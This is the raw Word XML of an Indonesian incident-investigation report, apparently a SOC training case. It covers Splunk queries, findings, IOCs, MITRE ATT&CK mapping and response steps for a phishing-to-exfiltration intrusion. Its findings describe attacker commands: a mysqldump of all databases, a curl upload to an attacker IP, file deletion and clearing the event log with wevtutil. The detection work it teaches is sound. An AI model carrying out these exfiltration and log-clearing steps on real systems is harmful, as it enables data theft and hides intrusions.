        </w:rPr>
        <w:t>📋 Task Created (4698)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>index=windows EventCode=4698</w:t>
        <w:br/>
        <w:t>| table _time host Task_Name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>Scheduled task "\Microsoft\Windows\Maintenance\SystemUpdate" dibuat — menjalankan svchost_update.exe (malware) setiap hari jam 09:00 sebagai SYSTEM. Bahkan kalau file dihapus, task akan tetap coba jalan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:t>T1136.002 (Create Account), T1078.002 (Domain Accounts), T1053.005 (Scheduled Task)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 7: Collection &amp; Exfiltration (Day 2-3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ini tujuan akhir attacker — mencuri data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 Database Dump (Day 2, 14:00)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>📋 Splunk Query — All Collection Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>index=linux sourcetype=linux_audit (comm="mysqldump" OR comm="tar" OR comm="curl")</w:t>
        <w:br/>
        <w:t>| sort _time</w:t>
        <w:br/>
        <w:t>| table _time host comm exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>3 langkah berurutan:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  1) mysqldump --all-databases → dump seluruh database MySQL</w:t>
        <w:br/>
        <w:t xml:space="preserve">  2) tar czf /tmp/bak.tar.gz → compress dump jadi ~250MB</w:t>
        <w:br/>
        <w:t xml:space="preserve">  3) curl POST upload ke 185.234.216.88 → kirim ke server attacker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 Exfiltration Evidence (Day 3, 02:30)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>📋 Firewall — Large Transfer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>index=firewall dest_ip=185.234.216.88</w:t>
        <w:br/>
        <w:t>| table _time src_ip dest_ip bytes_sent bytes_received</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>~250 MB data dikirim dari DB-SERVER-01 ke 185.234.216.88 pada jam 02:30 WIB — sengaja dilakukan after hours supaya tidak terdeteksi oleh analyst shift pagi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:t>T1005 (Data from Local System), T1041 (Exfiltration Over C2 Channel)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 8: Defense Evasion (Day 3, 02:35-02:40)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Setelah data dikirim, attacker mencoba menghapus jejak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 File Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>📋 Splunk Query</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>index=linux sourcetype=linux_audit comm="rm"</w:t>
        <w:br/>
        <w:t>| table _time host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>rm -f /tmp/bak.tar.gz — file dump yang sudah dikirim dihapus dari DB server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.2 Event Log Cleared</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>📋 Log Cleared (1102)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>index=windows EventCode=1102</w:t>
        <w:br/>
        <w:t>| table _time host Account_Name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>📋 Wevtutil Command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>index=sysmon EventID=1 Image="*wevtutil*"</w:t>
        <w:br/>
        <w:t>| table _time Computer CommandLine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>Security event log di WS-FINANCE-01 di-clear menggunakan "wevtutil cl Security". Ironi: event 1102 (log cleared) tetap tercatat karena itu adalah event TERAKHIR sebelum log di-clear. Ini mengapa event 1102 harus selalu di-alert — hampir selalu indikasi malicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:t>T1070.001 (Clear Event Logs), T1070.004 (File Deletion)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>IOC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91.215.85.142</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Recon scanner (Romania)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185.234.216.88</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Payload staging + exfil destination (Russia)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45.77.65.211</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>C2 server (Netherlands)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update-service.cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>C2 domain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dl.techsupport-cdn.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Payload download</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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a1b2c3d4e5f6...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Malicious payload hash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C:\...\Temp\svchost_update.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Dropped malware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/tmp/bak.tar.gz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Staged exfil data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svc_backup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Backdoor Domain Admin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...\Maintenance\SystemUpdate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Persistence mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE ATT&amp;CK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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Technique ID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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1595</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Suricata scan alerts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Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1566.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>WINWORD→cmd→powershell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T1059.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Encoded PowerShell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T1071.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>HTTPS beacon to 45.77.65.211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Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1082</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>whoami, ipconfig, net group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Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1003.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>LSASS memory access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Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1550.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>NTLM Pass-the-Hash to DC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Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1021.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SSH to DB server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T1136.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>svc_backup account created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T1053.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Scheduled task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Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>mysqldump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Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>curl upload 250MB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Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1070.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Event log cleared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Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T1070.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>File deleted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Recommended Immediate Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. Disable account "svc_backup" dan force reset password "ratna.finance"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2. Isolate WS-FINANCE-01 dan DB-SERVER-01 dari network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3. Block IP: 45.77.65.211, 185.234.216.88, 91.215.85.142 di firewall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4. Block domain: update-service.cloud, dl.techsupport-cdn.net di DNS/proxy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>5. Remove scheduled task "SystemUpdate" dari WS-FINANCE-01</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>6. Delete malware: svchost_update.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>7. Force password reset ALL Domain Admin accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>8. Full malware scan semua endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>9. Notify legal/compliance — potential data breach (customer database)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>10. Post-incident review: update detection rules, phishing awareness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9E7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